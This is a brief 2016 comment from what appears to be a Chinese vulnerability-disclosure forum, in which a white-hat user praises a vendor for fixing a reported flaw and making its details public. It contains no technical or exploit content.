  1. 2016-01-04 11:35 | 岛云首席鉴黄师 ( 普通白帽子 | Rank:460 漏洞数:125 | icisaw.cn 超低价虚拟主机VPS 购买返现 支...)

    2016-01-04: 厂商已经修复漏洞并主动公开,细节向公众公开厂商业界良心啊!!!